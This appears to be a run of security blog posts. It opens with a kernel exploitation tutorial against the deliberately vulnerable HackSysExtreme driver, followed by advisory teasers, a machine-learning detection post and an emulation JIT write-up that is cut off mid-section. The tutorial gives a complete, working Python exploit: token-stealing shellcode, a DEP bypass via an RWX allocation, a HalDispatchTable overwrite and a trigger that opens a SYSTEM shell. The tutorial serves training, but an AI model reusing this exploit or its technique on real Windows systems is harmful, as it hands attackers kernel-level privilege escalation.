
# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was copied directly into kernel mode without any checks. In this case, however, things are not that straightforward. Here, there is no memory copy DIRECTLY into kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the function pointer stored at HalDispatchTable + 0x4 is called from within KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntoskrnl.exe (ntoskrnl.exe exports the HalDispatchTable)
  3. Load ntoskrnl.exe into user mode via LoadLibraryExA() and then resolve the HalDispatchTable address via GetProcAddress()
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntoskrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the module name found via GetDeviceDriverBaseNameA() (ntoskrnl.exe in this case) and loads it into user mode, returning a handle. In the snippet below, that handle (still referring to ntoskrnl.exe) is then passed to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() reveals to us the address of the HalDispatchTable within the user mode mapping of ntoskrnl.exe. After rebasing that address to the kernel mode load address, we can calculate HalDispatchTable + 0x4, which is what we are really interested in.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes to the value (the first bytes reference the variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL + 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntoskrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here is where the What and Where come into play. We create a variable called write_what_where and set its What member (from the WriteWhatWhere() class created at the beginning of the exploit) to the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. In the end, a pointer to the variable write_what_where, which now carries both our pointer to the shellcode and HalDispatchTable + 0x4, is passed to the DeviceIoControl() function, which actually interacts with the driver.
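
For reference, the WriteWhatWhere class mentioned here is the ctypes Structure defined earlier in the exploit. A minimal sketch of what such a structure looks like (field types are illustrative; check the full exploit for the exact definition):

from ctypes import *

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),    # address of the value to be written (pointer to the shellcode pointer)
        ("Where", c_void_p)    # address to write to (HalDispatchTable + 0x4)
    ]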

One last thing. Take a peek here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. A pointer to our shellcode will be sitting at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that whatever is at HalDispatchTable + 0x4 gets executed (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls through HalDispatchTable + 0x4). And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

24 October 2019 at 17:22
TL;DR LSP4XML, the library used to parse XML files in VSCode-XML, Eclipse’s wildwebdeveloper, theia-xml and more, was affected by an XXE (CVE-2019-18213) which led to RCE (CVE-2019-18212) exploitable by just opening a malicious XML file. Introduction 2019 seems to be XXE’s year: during the latest Penetration Tests we successfully exploited a fair amount of XXEs, an example being https://www.shielder.it/blog/exploit-apache-solr-through-opencms/. It all started during a web application penetration test, while I was trying to exploit a blind XXE with zi0black.

Exploiting an old noVNC XSS (CVE-2017-18635) in OpenStack

19 October 2019 at 17:40
TL;DR: noVNC had a DOM-based XSS that allowed attackers to use a malicious VNC server to inject JavaScript code inside the web page. As OpenStack uses noVNC and its patching system doesn’t update third parties’ software, fully-updated OpenStack installations may still be vulnerable. Introduction Last week I was testing an OpenStack infrastructure during a Penetration Test. OpenStack is a free and open-source software platform for cloud computing, where you can manage and deploy virtual servers and other resources.

Detecting random filenames using (un)supervised machine learning

By: Fox IT
16 October 2019 at 11:00

Combining both n-grams and random forest models to detect malicious activity.

Author: Haroen Bashir

An essential part of Managed Detection and Response at Fox-IT is the Security Operations Center. This is our frontline for detecting and analyzing possible threats. Our Security Operations Center brings together the best in human and machine analysis and we continually strive to improve both. For instance, we develop machine learning techniques for detecting malicious content such as DGA domains or unusual SMB traffic. In this blog entry we describe a possible method for random filename detection.

During traffic analysis of lateral movement we sometimes recognize random filenames, indicating possible malicious activity or content. Malicious actors often need to move through a network to reach their primary objective, more popularly known as lateral movement [1].

There is a variety of routes for adversaries to perform lateral movement. Attackers can use penetration testing frameworks such as Metasploit [3] or the Microsoft Sysinternals application PsExec. This application creates the possibility for remote command execution over the SMB protocol [4].

Due to its malicious nature we would like to detect lateral movement as quickly as possible. In this blogpost we build on our previous blog entry [2] and we describe how we can apply the magic of machine learning in detection of random filenames in SMB traffic.

Supervised versus unsupervised detection models 

Machine learning can be applied in various domains. It is widely used for prediction and classification models, which suits our purpose perfectly. We investigated two possible machine learning architectures for random filename detection.

The first detection method for random filenames is set up by creating bigrams of filenames,  which you can find more information about in our previous post [2]. This detection method is based on unsupervised learning. After the model learns a baseline of common filenames, it can now detect when filenames don’t belong in its learned baseline.
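
To make this concrete, here is a minimal sketch (our own illustration, not the actual Fox-IT code) of such a baseline: count character bigrams over benign filenames, then score new filenames by the average log-probability of their bigrams. Random-looking names consist of rare bigrams and score low.

import math
from collections import Counter

def bigrams(name):
    return [name[i:i+2] for i in range(len(name) - 1)]

# Learn a baseline of common bigrams from (toy) benign filenames
baseline = Counter()
for name in ["invoice_q3", "report_final", "setup", "readme"]:
    baseline.update(bigrams(name))
total = float(sum(baseline.values()))

def score(name):
    # Average log-probability of the filename's bigrams under the baseline (add-one smoothing)
    probs = [(baseline[b] + 1) / (total + len(baseline)) for b in bigrams(name)]
    return sum(math.log(p) for p in probs) / len(probs)

print(score("report_new"))   # common bigrams, higher score
print(score("xkqzpwrt"))     # rare bigrams, lower score -> flagged as random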

This model has a drawback; it requires a lot of data. The solution can be found with supervised machine learning models. With supervised machine learning we feed a model data whilst simultaneously providing the label of the data. In our current case, we label data as either random or not-random.

A powerful supervised machine learning model is the random forest. We picked this architecture as it’s widely used for predictive models in both classification and regression problems. For an introduction into this technique we advise you to see [5]. The random forest is based on multiple decision trees, increasing the stability of a detection model. The following diagram illustrates the architecture of the detection model we built.
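
As a rough sketch of how such a pipeline could be wired up (purely illustrative: the library choice, features and parameters below are our own assumptions, not Fox-IT's implementation), the character bigrams can be mapped to count vectors and fed into a random forest with a small depth:

from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import cross_val_score

filenames = ["invoice_q3", "setup", "report_final", "readme",
             "xkqzpwrt", "aj3kd9qz", "qzpxlmwr", "zk8qwjvn"]   # toy examples
labels    = [0, 0, 0, 0, 1, 1, 1, 1]                           # 0 = not random, 1 = random

# Map each filename to a numerical vector of character-bigram counts
vectorizer = CountVectorizer(analyzer="char", ngram_range=(2, 2))
X = vectorizer.fit_transform(filenames)

# Keep the depth low to avoid overfitting, as discussed above
clf = RandomForestClassifier(n_estimators=100, max_depth=5)
print(cross_val_score(clf, X, labels, cv=2))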

Similar to the first model, we create bigrams of the filenames. The model cannot train on bigrams however, so we have to map the bigrams into numerical vectors. After training and testing the model we then focus on fine-tuning hyperparameters. This is essential for increasing the stability of the model. An important hyperparameter of the random forest is depth. A greater depth will create more decision splits in the random forest, which can easily cause overfitting. It is therefore highly desirable to keep the depth as low as possible, whilst simultaneously maintaining high precision rates.

Results

Proper data is one of the most essential parts in machine learning. We gathered our data by scraping nearly 180,000 filenames from SMB logs of our own network. In addition, we generated 1,000 random filenames ourselves. We want to make sure that the models don’t develop a bias towards, for example, the extension “.exe”, so we stripped the extensions from the filenames.

As we stated earlier the bigrams model is based on our previously published DGA detection model. This model has been trained on 90% of the filenames. It is then tested on the remaining filenames and 100% of the random filenames.

The random forest has been trained and tested in multiple folds, which is a cross-validation technique [6]. We evaluate our predictions in a joint confusion matrix, which is illustrated below.

True positives are shown in the upper right column: the bigrams model detected 71% of random filenames and the random forest detected 81% of random filenames. As you can see the models produce low false positive rates; in both models ~0% of not-random filenames have been incorrectly classified as random. This is great for use in our Security Operations Center, as this keeps the workload on the analysts consistent.

The F1-scores are 0.83 and 0.89 respectively. Because we focus on adding detection with low false positive rates, it is not our priority to reduce the false negative rates. In future work we will take a better look at the false negative rates of the models.

We were quite interested in the differences between both detection models. Looking at the visualization below we can observe that both models equally detect 572 random filenames. They separately detect 236 and 141 random filenames respectively. The bigrams model might miss more random filenames due to its unsupervised architecture. It is possible that the bigrams model requires more data to create its baseline and therefore doesn’t perform as well as the supervised random forest.

The overlap in both models and the low false positive rate gave us the idea to run both these models cooperatively for detection of random filenames. It doesn’t cost much processing and we would gain a lot! In a practical setting this would mean that if a random filename slips by one detection model, it is still possible for the other model to detect it. In theory, we detect 90% of random filenames! The low false positive rates and complementary aspects of the detection models indicate that this setup could be really useful for detection in our Security Operations Center.

Conclusion

During traffic analysis in our Security Operations Center we sometimes recognize random filenames, indicating possible lateral movement. Malicious actors can use penetration testing frameworks (e.g. Metasploit) and Microsoft processes (e.g. PsExec) for lateral movement. If adversaries are able to do this, they can easily compromise a (sub)network of a target. Needless to say that we want to detect this behavior as quickly as possible.

In this blog entry we described how we applied machine learning in order to detect these random filenames. We showed two models for detection: a bigrams model and a random forest. Both these models yield good results in testing stage, indicated by the low false positive rates. We also looked at the overlap in predictions from which we concluded that we can detect 90% of random filenames in SMB traffic! This gave us the idea to run both detection models cooperatively in our Security Operations Center.

For future work we would like to research the usability of these models on endpoint data, as our current research is solely focused on detection in network traffic. There is for instance lots of malware that outputs random filenames on a local machine. This is just one of many possibilities which we can better investigate.

All in all, we can confidently conclude that machine learning methods are one of many efficient ways to keep up with adversaries and improve our security operations!

 

References

[1] – https://attack.mitre.org/tactics/TA0008/

[2] – https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains.

[3] – https://www.offensive-security.com/metasploit-unleashed/pivoting/

[4] – https://www.mindpointgroup.com/blog/lateral-movement-with-psexec/

[5] – https://medium.com/@williamkoehrsen/random-forest-simple-explanation-377895a60d2d

[6] – https://towardsdatascience.com/why-and-how-to-cross-validate-a-model-d6424b45261f

 

 

 

 

 

Miniblog: How conditional branches work in Vectorized Emulation

7 October 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!


Prereqs

You should probably read the Introduction to Vectorized Emulation blog!

Or perhaps watch the talk I gave at RECON 2019

Summary

I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.

This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example. What I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emit simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.


FalkIL Example

Here’s an example of what FalkIL looks like:

FalkIL example


JIT

Here’s what the JIT for the above IL example looks like:

FalkIL JIT example

Ooof… that exploded a bit. Let’s dive in!


JIT Calling Convention

Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.

Kmask Registers

Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.

Intel provides us with 8 kmask registers. k0 through k7. k0 is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.

Online VM mask

Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since k1 is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in k1 (VM is disabled), must not have its state modified. Thus you’ll see k1 is used as a merging mask for almost every single vectorized operation we do.

By using the k1 mask in every instruction, we preserve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.

This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).

“Following” VM mask

At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in k7. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.

The VM we are “following” must always be active, and thus (k7 & k1) != 0 must always be true! This k7 mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this k7 mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).

Kmask Register Summary

Here’s the complete state of kmask register allocation during JIT

K0    - Hardcoded in hardware to all ones
K1    - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7    - "Following" VM mask

ZMM registers

The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.

“Following” VM index vector

Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of zmm30. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.

By holding the index (effectively the bit index of the following VM mask) in all lanes of the zmm30 vector, we can perform a single vpermq instruction to broadcast the following VM’s value to all lanes in a vector.

Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirety of a JIT execution (until a JIT/VM exit).

Why this is important

Lets say:

zmm31 contains [10, 11, 12, 13, 14, 15, 16, 17]

zmm30 contains [3, 3, 3, 3, 3, 3, 3, 3]

The CPU then executes vpermq zmm0, zmm30, zmm31

zmm0 now contains [13, 13, 13, 13, 13, 13, 13, 13]… the 3rd VM’s value in zmm31 broadcast to all lanes of zmm0

Effectively vpermq uses the indices in its second operand to select values from the third operand.
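
If it helps to see that outside of assembly, here’s a tiny Python model of the broadcast behaviour (just mirroring the description above, not actual emulator code):

def vpermq(indices, values):
    # Each output lane i selects values[indices[i]] (quadword permute)
    return [values[i & 7] for i in indices]

zmm30 = [3] * 8                              # index of the VM we are following, in all lanes
zmm31 = [10, 11, 12, 13, 14, 15, 16, 17]     # per-lane values
print(vpermq(zmm30, zmm31))                  # [13, 13, 13, 13, 13, 13, 13, 13]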

“Desired target” vector

We allocate one other ZMM register (zmm31) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, zmm31 will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(

ZMM Register Summary

Here’s the complete state of ZMM register allocation during JIT

Zmm0-Zmm3  - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30      - Index of the VM we are following broadcast to all 8 quadwords
Zmm31      - Branch targets for each VM, indicates where all VMs want to execute

General purpose registers

These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the MMU blog!

When ignoring the MMU, there are only 2 GPRs that we have a special use for…

Constant storage database

On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR (mov), then moving it into the lowest-order lane of a vector (vmovq), and then broadcasting it (vpbroadcastq), is actually a lot more expensive than just loading that value from memory.

To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by r11 during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single vpbroadcastq zmm, kmask, qword [r11+OFFSET] instruction.
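
A toy model of what that constant storage database amounts to (this just illustrates the append-and-dedup behaviour described above, it is not the actual JIT code):

class ConstantDB(object):
    def __init__(self):
        self.consts = []      # quadword constants, in allocation order
        self.offsets = {}     # value -> byte offset from r11

    def offset_of(self, value):
        # Dedup shared constants; new constants are appended to the table
        if value not in self.offsets:
            self.offsets[value] = len(self.consts) * 8
            self.consts.append(value)
        return self.offsets[value]

db = ConstantDB()
print(hex(db.offset_of(0x1337)))   # 0x0
print(hex(db.offset_of(0x1337)))   # 0x0 (deduplicated)
print(hex(db.offset_of(0xdead)))   # 0x8 -> vpbroadcastq zmm, k1, qword [r11+0x8]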

While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.

Target registers

At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by r12. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.

GPR summary

r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers

Phew

Okay, now we know what register states look like when executing in JIT!


Conditional branches

Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.

Here’s the specific code in question for a conditional branch:

Conditional Branch

Well that looks awfully complex… but it’s really not. It’s quite magical!

The comparison

comparison

First, the comparison is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into k2. This means that k2 will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask k1 here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, k2 has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.

In this case the 0x1 immediate to the vpcmpuq instruction indicates that this is a “less than” comparison.

vpcmpq/vpcmpuq immediate

Note that the immediate value provided to vpcmpq and the unsigned variant vpcmpuq determines the type of the comparison:

cmpimm

The comparison inversion

comparison inversion

Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.

kandnw performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have k2 as the second operand (the result of the comparison) this gets negated. This then gets anded with k1 (the third operand) to mask off VMs which are not actively executing. The result is that k3 now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.

In C/C++ this is simply: k3 = (~k2) & k1

